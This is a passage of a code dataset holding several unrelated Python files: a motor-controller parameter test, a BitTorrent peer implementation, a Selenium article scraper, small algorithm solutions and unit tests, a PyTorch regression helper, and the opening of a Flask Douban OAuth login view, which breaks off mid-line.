module.APs.ChopperBlankTime))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.ChopperBlankTime, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"ConstantTOffMode\", module.APs.ConstantTOffMode))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.ConstantTOffMode, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"DisableFastDecayComparator\", module.APs.DisableFastDecayComparator))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.DisableFastDecayComparator, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"ChopperHysteresisEnd\", module.APs.ChopperHysteresisEnd))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.ChopperHysteresisEnd, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"ChopperHysteresisStart\", module.APs.ChopperHysteresisStart))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.ChopperHysteresisStart, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"TOff\", module.APs.TOff))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.TOff, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"SEIMIN\", module.APs.SEIMIN))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.SEIMIN, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"SECDS\", module.APs.SECDS))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.SECDS, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"smartEnergyHysteresis\", module.APs.smartEnergyHysteresis))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.smartEnergyHysteresis, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"SECUS\", module.APs.SECUS))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.SECUS, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"smartEnergyHysteresisStart\", module.APs.smartEnergyHysteresisStart))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.smartEnergyHysteresisStart, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"SG2FilterEnable\", module.APs.SG2FilterEnable))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.SG2FilterEnable, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"SG2Threshold\", module.APs.SG2Threshold))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.SG2Threshold, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"ShortToGroundProtection\", module.APs.ShortToGroundProtection))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.ShortToGroundProtection, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"VSense\", module.APs.VSense))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.VSense, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"smartEnergyActualCurrent\", module.APs.smartEnergyActualCurrent))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.smartEnergyActualCurrent, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"smartEnergyStallVelocity\", module.APs.smartEnergyStallVelocity))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.smartEnergyStallVelocity, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"smartEnergyThresholdSpeed\", module.APs.smartEnergyThresholdSpeed))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.smartEnergyThresholdSpeed, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"RandomTOffMode\", module.APs.RandomTOffMode))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.RandomTOffMode, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"ChopperSynchronization\", module.APs.ChopperSynchronization))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.ChopperSynchronization, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"PWMThresholdSpeed\", module.APs.PWMThresholdSpeed))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.PWMThresholdSpeed, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"PWMGrad\", module.APs.PWMGrad))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.PWMGrad, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"PWMAmplitude\", module.APs.PWMAmplitude))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.PWMAmplitude, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"PWMScale\", module.APs.PWMScale))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.PWMScale, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"pwmMode\", module.APs.pwmMode))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.pwmMode, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"PWMFrequency\", module.APs.PWMFrequency))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.PWMFrequency, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"PWMAutoscale\", module.APs.PWMAutoscale))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.PWMAutoscale, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"ReferenceSearchMode\", module.APs.ReferenceSearchMode))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.ReferenceSearchMode, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"ReferenceSearchSpeed\", module.APs.ReferenceSearchSpeed))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.ReferenceSearchSpeed, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"RefSwitchSpeed\", module.APs.RefSwitchSpeed))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.RefSwitchSpeed, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"RightLimitSwitchPosition\", module.APs.RightLimitSwitchPosition))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.RightLimitSwitchPosition, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"LastReferencePosition\", module.APs.LastReferencePosition))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.LastReferencePosition, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"encoderMode\", module.APs.encoderMode))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.encoderMode, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"MotorFullStepResolution\", module.APs.MotorFullStepResolution))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.MotorFullStepResolution, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"pwmSymmetric\", module.APs.pwmSymmetric))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.pwmSymmetric, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"FreewheelingMode\", module.APs.FreewheelingMode))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.FreewheelingMode, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"LoadValue\", module.APs.LoadValue))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.LoadValue, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"extendedErrorFlags\", module.APs.extendedErrorFlags))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.extendedErrorFlags, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"DrvStatusFlags\", module.APs.DrvStatusFlags))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.DrvStatusFlags, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"EncoderPosition\", module.APs.EncoderPosition))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.EncoderPosition, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"EncoderResolution\", module.APs.EncoderResolution))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.EncoderResolution, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"max_EncoderDeviation\", module.APs.max_EncoderDeviation))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.max_EncoderDeviation, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"PowerDownDelay\", module.APs.PowerDownDelay))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.PowerDownDelay, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"UnitMode\", module.APs.UnitMode))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.UnitMode, AP_AXIS)))\n\nlogger.info(\"Test completed successfully.\")\n","sub_path":"PyTrinamicMicro/platforms/motionpy/tests/modules/TMCM1270/parameters.py","file_name":"parameters.py","file_ext":"py","file_size_in_byte":17886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"263543178","text":"__author__ = 'alexisgallepe'\n\nimport sys\nimport socket\nimport struct\nimport bitstring\nfrom bitstring import BitArray\nfrom pubsub import pub\nfrom . import utils\nimport threading\nimport logging\nfrom six import string_types\n\n\nclass Peer(object):\n def __init__(self, torrent, ip, port=6881):\n self.lastHandshakeAttempt = 0\n self.lock = threading.Lock()\n self.handshake = None\n self.hasHandshaked = False\n self.readBuffer = b\"\"\n self.counter = 10\n self.socket = None\n self.ip = ip\n self.port = port\n self.torrent = torrent\n self.socketsPeers = []\n\n self.state = {\n 'am_choking': True,\n 'am_interested': False,\n 'peer_choking': True,\n 'peer_interested': False,\n }\n\n self.idFunction = {\n 0: self.choke,\n 1: self.unchoke,\n 2: self.interested,\n 3: self.not_interested,\n 4: self.have,\n 5: self.bitfield,\n 6: self.request,\n 7: self.piece,\n 8: self.cancel,\n 9: self.portRequest\n }\n\n self.numberOfPieces = torrent.numberOfPieces\n self.bitField = bitstring.BitArray(self.numberOfPieces)\n\n def connectToPeer(self, timeout=10):\n try:\n self.socket = socket.create_connection((self.ip, self.port), timeout)\n logging.info(\"connected to peer ip: {0} - port: {1}\".format(self.ip, self.port))\n self.build_handshake()\n return True\n except Exception:\n logging.error(str(self.ip) + \": connectToPeer Socket Timeout Error\")\n pass\n return False\n\n def hasPiece(self, index):\n return self.bitField[index]\n\n def build_handshake(self):\n pstr = \"BitTorrent protocol\".encode('utf-8')\n reserved = \"0\" * 8\n hs = struct.pack(\"B\" + str(len(pstr)) + \"s8x20s20s\",\n len(pstr),\n pstr,\n # reserved,\n self.torrent.info_hash,\n self.torrent.peer_id\n )\n assert len(hs) == 49 + len(pstr)\n self.handshake = hs\n\n def build_interested(self):\n return struct.pack('!I', 1) + struct.pack('!B', 2)\n\n def build_request(self, index, offset, length):\n header = struct.pack('>I', 13)\n id = b'\\x06'\n\n if isinstance(length, (bytes, bytearray)):\n id = '\\x06'\n\n index = struct.pack('>I', index)\n offset = struct.pack('>I', offset)\n length = struct.pack('>I', length)\n request = header + id + index + offset + length\n\n return request\n\n def build_piece(self, index, offset, data):\n header = struct.pack('>I', 13)\n id = '\\x07'\n index = struct.pack('>I', index)\n offset = struct.pack('>I', offset)\n data = struct.pack('>I', data)\n piece = header + id + index + offset + data\n\n return piece\n\n def build_bitfield(self):\n length = struct.pack('>I', 4)\n id = '\\x05'\n bitfield = self.bitField.tobytes()\n bitfield = length + id + bitfield\n return bitfield\n\n def sendToPeer(self, msg):\n try:\n self.socket.send(msg)\n except Exception as e:\n logging.error(str(self.ip) + \": sendToPeer Error: \" + str(e))\n\n def checkHandshake(self, buf, pstr=\"BitTorrent protocol\"):\n if isinstance(buf, (bytes, bytearray)):\n pstr_rec = buf[1:20].decode('utf-8')\n else:\n pstr_rec = buf[1:20]\n\n if pstr_rec == pstr:\n handshake = buf[:68]\n expected_length, info_dict, info_hash, peer_id = struct.unpack(\n \"B\" + str(len(pstr)) + \"s8x20s20s\",\n handshake)\n\n if self.torrent.info_hash == info_hash:\n self.hasHandshaked = True\n # self.sendToPeer(self.build_bitfield())\n else:\n logging.warning(\"Error with peer's handshake\")\n\n self.readBuffer = self.readBuffer[28 + len(info_hash)+20:]\n\n def keep_alive(self, payload):\n try:\n keep_alive = struct.unpack(\"!I\", payload[:4])[0]\n if keep_alive == 0:\n logging.info('KEEP ALIVE')\n return True\n except Exception:\n pass\n\n return False\n\n def interested(self, payload=None):\n logging.info('interested')\n self.state['peer_interested'] = True\n\n def not_interested(self, payload=None):\n logging.info('not_interested')\n self.state['peer_interested'] = False\n\n def have(self, payload):\n index = utils.convertBytesToDecimal(payload)\n self.bitField[index] = True\n pub.sendMessage('RarestPiece.updatePeersBitfield', bitfield=self.bitField, peer=self)\n\n def bitfield(self, payload):\n self.bitField = BitArray(bytes=payload)\n logging.info('request')\n pub.sendMessage('RarestPiece.updatePeersBitfield', bitfield=self.bitField, peer=self)\n\n def request(self, payload):\n piece_index = payload[:4]\n block_offset = payload[4:8]\n block_length = payload[8:]\n logging.info('request')\n pub.sendMessage('PiecesManager.PeerRequestsPiece', piece=(piece_index, block_offset, block_length), peer=self)\n\n def piece(self, payload):\n piece_index = utils.convertBytesToDecimal(payload[:4])\n piece_offset = utils.convertBytesToDecimal(payload[4:8])\n piece_data = payload[8:]\n pub.sendMessage('PiecesManager.Piece', piece=(piece_index, piece_offset, piece_data))\n\n def cancel(self, payload=None):\n logging.info('cancel')\n\n def portRequest(self, payload=None):\n logging.info('portRequest')\n\n def choke(self,payload=None):\n logging.info(\"choking peer: \" + str(self.ip))\n self.state['peer_choking'] = True\n\n def unchoke(self,payload=None):\n logging.info(\"Unchoking peer: \" + str(self.ip))\n pub.sendMessage('PeersManager.peerUnchoked',peer=self)\n self.state['peer_choking'] = False\n\n def interested(self,payload=None):\n logging.info('interested')\n self.state['peer_interested'] = True\n\n def not_interested(self,payload=None):\n logging.info('not_interested')\n self.state['peer_interested'] = False\n","sub_path":"academictorrents/Peer.py","file_name":"Peer.py","file_ext":"py","file_size_in_byte":6376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"527464564","text":"from selenium import webdriver\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.firefox.options import Options\nfrom bs4 import BeautifulSoup\nfrom django.conf import settings\nfrom apps.news_scraper.models import Article\n\ndef extract_news_content(pk):\n if Article.objects.filter(pk=pk).exists():\n \n article_obj = Article.objects.get(pk=pk)\n\n try :\n\n options = Options()\n options.headless = True\n driver = webdriver.Firefox(options=options, executable_path=\"/usr/bin/geckodriver\")\n\n driver.get(f\"about:reader?url={article_obj.url}\")\n timeout = 10\n\n WebDriverWait(driver, timeout).until(lambda driver: driver.find_element_by_css_selector('h1.reader-title').get_attribute(\"innerHTML\") != \"\")\n # title = driver.find_element_by_css_selector(\"h1.reader-title\").get_attribute(\"innerHTML\")\n # author = driver.find_element_by_css_selector('div[class=\"credits reader-credits\"]').get_attribute(\"innerHTML\")\n article = driver.find_element_by_css_selector('div.content').get_attribute(\"innerHTML\")\n\n soup = BeautifulSoup(article, \"html.parser\")\n images = [image['src'] for image in soup.select(\"img\")]\n for elem in soup.select(\"img\"):\n elem.extract()\n\n hyperlinks = [{'title': link.text, 'url': link['href']} for link in soup.find_all('a', href=True)]\n\n \n article_obj.content = soup.text\n article_obj.images = images\n article_obj.hyperlinks = hyperlinks\n article_obj.status = 'completed'\n article_obj.save()\n\n driver.quit()\n\n return True\n\n except Exception as e :\n print(e)\n return None\n\n else :\n return False\n","sub_path":"picard/apps/news_scraper/scraper/article_scraper.py","file_name":"article_scraper.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"57947750","text":"import functools\n\nfrom slu import constants as const\n\n\ndef task_guard(func):\n def wrapper(self, task_name: str, *args, **kwargs):\n supported_tasks = {const.CLASSIFICATION, const.NER}\n\n if task_name not in supported_tasks:\n raise ValueError(f\"Task should be one of {supported_tasks}\")\n\n use_task = self.task_by_name(task_name).use\n\n if use_task:\n value = func(self, task_name,*args, **kwargs)\n return value\n else:\n return None\n return wrapper\n","sub_path":"slu/slu/utils/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"631948984","text":"'''\nInput: a List of integers where every int except one shows up twice\nReturns: an integer\n'''\ndef single_number(arr):\n # Your code here\n # iterate through array, checking each element\n # against its neighboring element\n # This will require us to use i and i+1\n\n # start by sorting our array\n arr = sorted(arr)\n \n # iterate through our array with a step of 2\n for i in range(0, len(arr), 2):\n # compare value at index i to value at \n # index i + 1 to determine if they're the same\n try:\n if arr[i] != arr[i + 1]:\n # in this case there is only one\n # possible scenario; the value at \n # index i must be the odd number out\n return arr[i]\n\n # If an IndexError exception is thrown, that means\n # we have reached the second to last element of \n # our array without finding the odd number out; because\n # this means there is only one number left to check, \n # we can conclude that the value in the last index of\n # the array will be the odd number out, so we return\n # the value at that index\n except(IndexError):\n return arr[-1]\n\n\nif __name__ == '__main__':\n # Use the main function to test your implementation\n arr = [1, 1, 4, 4, 5, 5, 3, 3, 9, 0, 0]\n\n print(f\"The odd-number-out is {single_number(arr)}\")","sub_path":"single_number/single_number.py","file_name":"single_number.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"264232472","text":"import random\nimport unittest\n\nimport time\n\nfrom week1.matrix import Matrix\nfrom week1.quick_sort import quick_sort\n\n\nclass TestMatrix(unittest.TestCase):\n def test_create(self):\n self.assertRaises(TypeError, Matrix, 1)\n self.assertRaises(TypeError, Matrix, 'asdf')\n self.assertRaises(TypeError, Matrix, [1, 2, 3])\n self.assertRaises(TypeError, Matrix, [[1, 2, 3], [1, 2]])\n\n a = [[1, 2],\n [2, 3]]\n try:\n Matrix(a)\n except Exception as e:\n self.fail('Matrix initialization is failed for {0}: {1}'.format(a, e))\n\n def test_add(self):\n a = [[1, 2],\n [2, 1]]\n b = [[0, -1],\n [1, 2]]\n c = [[1, 1],\n [3, 3]]\n self.assertEqual(Matrix(a) + Matrix(b), Matrix(c))\n self.assertEqual(Matrix(b) + Matrix(a), Matrix(c))\n\n d = [[0, -1],\n [1, 2],\n [0, 0]]\n\n with self.assertRaises(IndexError):\n Matrix(a) + Matrix(d)\n\n def test_add_negative(self):\n a = Matrix([[0, 0],\n [0, 1]])\n with self.assertRaises(TypeError):\n a + 1\n with self.assertRaises(TypeError):\n a + [[0], [1]]\n with self.assertRaises(TypeError):\n a + 'sdfs'\n\n\n def test_mul_sq(self):\n a = Matrix([[1, 2], [2, 3]])\n b = Matrix([[1, 0], [0, 1]])\n\n self.assertEqual(a * b, a)\n self.assertEqual(b * b, b)\n\n def test_mul_no_sq(self):\n a = [[1, 2, 3],\n [-3, 2, 1]]\n b = [[1, 2],\n [-2, -1],\n [1, 0]]\n c1 = [[0, 0], [-6, -8]]\n c2 = [[-5, 6, 5], [1, -6, -7], [1, 2, 3]]\n self.assertEqual(Matrix(a) * Matrix(b), Matrix(c1))\n self.assertEqual(Matrix(b) * Matrix(a), Matrix(c2))\n\n def test_mul_no_sq_negative(self):\n a = [[1, 2, 3],\n [-3, 2, 1]]\n b = [[1, 2],\n [-2, -1],\n [1, 0],\n [0, 2]]\n with self.assertRaises(IndexError):\n Matrix(a) * Matrix(b)\n try:\n Matrix(b) * Matrix(a)\n except IndexError:\n self.fail('Index error on multiplying {0} on {1}'.format(b, a))\n\n def test_mul_int(self):\n a = [[2, 1, 3],\n [-1, 1, 0]]\n b = [[6, 3, 9],\n [-3, 3, 0]]\n self.assertEqual(Matrix(a) * 3, Matrix(b))\n self.assertEqual(3 * Matrix(a), Matrix(b))\n\n def test_mul_negative(self):\n a = Matrix([[1, 2], [2, 3]])\n\n with self.assertRaises(TypeError):\n a * [[1, 2]]\n with self.assertRaises(TypeError):\n a * 'test'\n\n def test_identity(self):\n identity_arr = [[0] * 5 for _ in xrange(5)]\n for i in xrange(len(identity_arr)):\n identity_arr[i][i] = 1\n self.assertEqual(Matrix.Identity(5), Matrix(identity_arr))\n\n def test_zeros(self):\n zeros_arr = [[0] * 5 for _ in xrange(7)]\n self.assertEqual(Matrix.Zeros(5, 7), Matrix(zeros_arr))\n\n\nclass TestQuickSort(unittest.TestCase):\n def test_empty(self):\n self.assertEqual(quick_sort([]), [])\n\n def test_len_1(self):\n self.assertEqual(quick_sort([1]), [1])\n\n def test_len_2(self):\n self.assertEqual(quick_sort([2, 1]), [1, 2])\n\n def test_len_3(self):\n self.assertEqual(quick_sort([3, 2, 1]), [1, 2, 3])\n\n def test_len_4(self):\n self.assertEqual(quick_sort([4, 3, 2, 1]), [1, 2, 3, 4])\n\n def test_len_5(self):\n self.assertEqual(quick_sort([5, 4, 3, 2, 1]), [1, 2, 3, 4, 5])\n\n def test_sort(self):\n for i in xrange(10):\n array = [random.randint(-1000, 1000) for _ in xrange(1500)]\n self.assertEqual(quick_sort(array), sorted(array))\n\n def test_time(self):\n array = [random.randint(-10000, 10000) for _ in xrange(15000)]\n start = time.time()\n quick_sort(array)\n end_time = time.time() - start\n self.assertTrue(end_time < 1)\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"week1/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":4035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"209240002","text":"import numpy as np\n\nimport torch\nimport torch.optim as optim\nfrom torch.utils.data import TensorDataset, DataLoader\n\n\n\nclass NN(object):\n def __init__(self, in_dim, out_dim, lr):\n\n self.model_nn = torch.nn.Sequential( # neuronale Netzwerk\n torch.nn.Linear(in_dim, 20),\n torch.nn.LeakyReLU(),\n torch.nn.Linear(20,20),\n torch.nn.LeakyReLU(),\n torch.nn.Linear(20, out_dim)\n )\n\n self.criterion = torch.nn.MSELoss()\n self.optimizer = optim.SGD(self.model_nn.parameters(), lr=lr, momentum=0.9)\n\n def set_discretizations(self, state_disc, action_disc):\n self.state_disc = state_disc\n self.action_disc = action_disc\n\n '''\n Train the network\n param x: state action pairs, that are the input for the network\n as numpy matrix - samples x feature-dim\n param y: state, that shall be predicted by the network\n as numpy matrix - samples x feature-dim\n param N: how often the training shall iterate over the dataset\n '''\n def train(self, x, y, N):\n # TODO: This could probably be done prettier:\n # transform to torch dataset:\n x_dim = x.shape[1] # To reconstruct parts of tensor later\n data_in = TensorDataset(torch.tensor(np.append(x, y, 1),\n dtype=torch.float))\n loader = DataLoader(data_in, batch_size=8, shuffle=True)\n\n # Training:\n for epoch in range(N): # loop over the dataset multiple times\n for i, data in enumerate(loader, 0):\n\n # zero the parameter gradients\n self.optimizer.zero_grad()\n\n # extract features and labels:\n x = data[0][:, :x_dim] # data is a list with 1 entry -> [0]\n y = data[0][:, x_dim:]\n\n # forward + backward + optimize\n prediction = self.model_nn(x)\n loss = self.criterion(prediction, y) # s solls weden, das weiß man\n loss.backward()\n self.optimizer.step()\n\n def validate(self, x, y): # only for neural net that learns dynamics\n prediction = self.model_nn(torch.tensor(x, dtype=torch.float))\n loss = self.criterion(prediction, torch.tensor(y, dtype=torch.float))\n return loss.item()\n\n def dynamics_model(self, s, a):\n s = np.matrix(self.state_disc.undiscretize(s))\n a = np.matrix(self.action_disc.undiscretize(a))\n sa = np.append(s, a, 1)\n sa = torch.tensor(sa, dtype=torch.float)\n s_new = self.model_nn(sa).detach().numpy()\n return self.state_disc.discretize(s_new).astype(int)[0,:]\n\n\n def stochastic_dynamics_model(self, s, a):\n s = np.matrix(self.state_disc.undiscretize(s))\n a = np.matrix(self.action_disc.undiscretize(a))\n sa = np.append(s, a, 1)\n sa = torch.tensor(sa, dtype=torch.float)\n s_new = self.model_nn(sa).detach().numpy()\n s_new_bins, s_new_weights = self.state_disc.discretize_normal(s_new)\n\n \n\n def reward_model(self, s, a):\n s = np.matrix(self.state_disc.undiscretize(s))\n a = np.matrix(self.action_disc.undiscretize(a))\n sa = np.append(s, a, 1)\n sa = torch.tensor(sa, dtype=torch.float)\n r = self.model_nn(sa).detach().numpy()[0,0]\n return r\n\nclass LinearRegression(object):\n #def __init__(self):\n\n def train(self, sa, r, s):\n self.beta_s = np.linalg.lstsq(sa, s, rcond=-1)[0]\n self.beta_r = np.linalg.lstsq(sa, r, rcond=-1)[0]\n\n\n def validate(self, sa, r, s):\n mse_s = np.power((sa*self.beta_s-s),2).sum()/sa.shape[0]\n mse_r = np.power((sa*self.beta_r-r),2).sum()/sa.shape[0]\n return mse_r, mse_s\n\n def predict_r(self, sa):\n return sa*self.beta_r\n\n def reward_model(self, s, a):\n s = np.matrix(self.state_disc.undiscretize(s))\n a = np.matrix(self.action_disc.undiscretize(a))\n sa = np.append(s, a, 1)\n r = linear.predict_r(sa)\n return r # muss nicht diskretisiert werden\n","sub_path":"Challenge1/regression.py","file_name":"regression.py","file_ext":"py","file_size_in_byte":4061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"379236889","text":"# -*- coding:utf-8 -*-\nimport json\nimport os\nimport importlib\nfrom collections import OrderedDict\n\n__author__ = 'chengchao'\n\n# 此处为获取当前项目所处的根目录,\n# 默认为工程根目录\n# 非线程安全\nroot_path = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n\ndef read_str_file(path):\n \"\"\"\n 根据path读取文件内容,并返回string\n :param path: 相对于根项目的路径\n :return: 文件中的所有内容\n \"\"\"\n if is_empty_str(path):\n raise ValueError(\"路径为空\")\n abspath = get_abs_path(path)\n stream = open(abspath)\n result = \"\"\n for line in stream:\n result += line\n stream.close()\n return result\n\n\ndef load_json_from_file(path):\n jsons = read_str_file(path)\n return json.loads(jsons, object_pairs_hook=OrderedDict)\n\n\ndef get_abs_path(path):\n # todo 此处需要优化,下面代码可能存在bug\n return root_path + os.sep + path\n\n\ndef is_empty_str(str):\n return str is None or str == ''\n\n\ndef is_simple_type(obj):\n return isinstance(obj, (int, float, long, basestring, bool))\n\n\ndef is_empty_arr(arr):\n return arr is None or len(arr) == 0\n\n\ndef to_list(obj):\n lists = obj if isinstance(obj, list) else [obj]\n results = []\n for item in lists:\n results.extend(listfile_by_wildcard(item))\n return results\n\n\ndef listfile_by_wildcard(path):\n if is_empty_str(path):\n return []\n index = path.rfind('*')\n if index == -1:\n return [path]\n return listfiles(path[:index])\n\n\ndef listfiles(path):\n if is_empty_str(path):\n return []\n abs_path = get_abs_path(path)\n if not os.path.isdir(abs_path):\n return []\n lists = os.listdir(abs_path)\n result = []\n for one in lists:\n if os.path.isfile(abs_path + \"/\" + one):\n result.append(path + one)\n return result\n\n\ndef del_if_exist_and_return(key, _dict, default=None):\n value = default if key not in _dict else _dict[key]\n if key in _dict:\n del _dict[key]\n return value\n\n\ndef get_from_arr_by_index(arr, index, default=None):\n if index < 0 or index >= len(arr):\n return default\n return arr[index]\n\n\ndef construct_service(service_name, service_args):\n pos = service_name.rfind('.')\n if pos == -1:\n raise ValueError(\"错误的class配置:%s,格式为:module_name.class_name\" % service_name)\n module_name = service_name[:pos]\n class_name = service_name[pos + 1:]\n module_meta = importlib.import_module(module_name)\n class_meta = getattr(module_meta, class_name)\n return class_meta(service_args)\n","sub_path":"core/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"652766831","text":"#-*- coding: UTF-8 -*-\n\nfrom __future__ import division\n\nimport urllib, urllib2\n\nimport smtplib\nfrom email.mime.text import MIMEText\n\nimport hashlib\n\nimport math\n\nfrom flask import render_template, request, redirect, url_for, json, session\n\nfrom xichuangzhu import app\n\nimport config\n\nfrom xichuangzhu.models.user_model import User\nfrom xichuangzhu.models.love_work_model import Love_work\nfrom xichuangzhu.models.review_model import Review\nfrom xichuangzhu.models.inform_model import Inform\nfrom xichuangzhu.models.topic_model import Topic\n\nfrom xichuangzhu.utils import content_clean, time_diff, check_login\n\nfrom xichuangzhu.form import EmailForm\n\n# proc - login by douban's oauth2.0 (public)\n#--------------------------------------------------\n\n@app.route('/login/douban')\ndef auth():\n\tcode = request.args['code']\n\n\t# get access token and userID\n\turl = \"https://www.douban.com/service/auth2/token\"\n\tdata = {\n\t\t'client_id': config.DOUBAN_CLIENT_ID,\n\t\t'client_secret': config.DOUBAN_SECRET,\n\t\t'redirect_uri': config.DOUBAN_REDIRECT_URI,\n\t\t'grant_type': 'authorization_code',\n\t\t'code': code\n\t}\n\tdata = urllib.urlencode(data)\n\treq = urllib2.Request(url, data)\n\tresponse = urllib2.urlopen(req)\n\tinfo = eval(response.read())\n\tuser_id = int(info['douban_user_id'])\n\n\t# if user exist\n\tif User.check_exist_by_id(user_id):\n\t\t# if user unactive\n\t\tif not User.check_active(user_id):\n\t\t\treturn redirect(url_for('verify_email_callback', state='unactive', user_id=user_id))\n\t\telse:\n\t\t\t# set 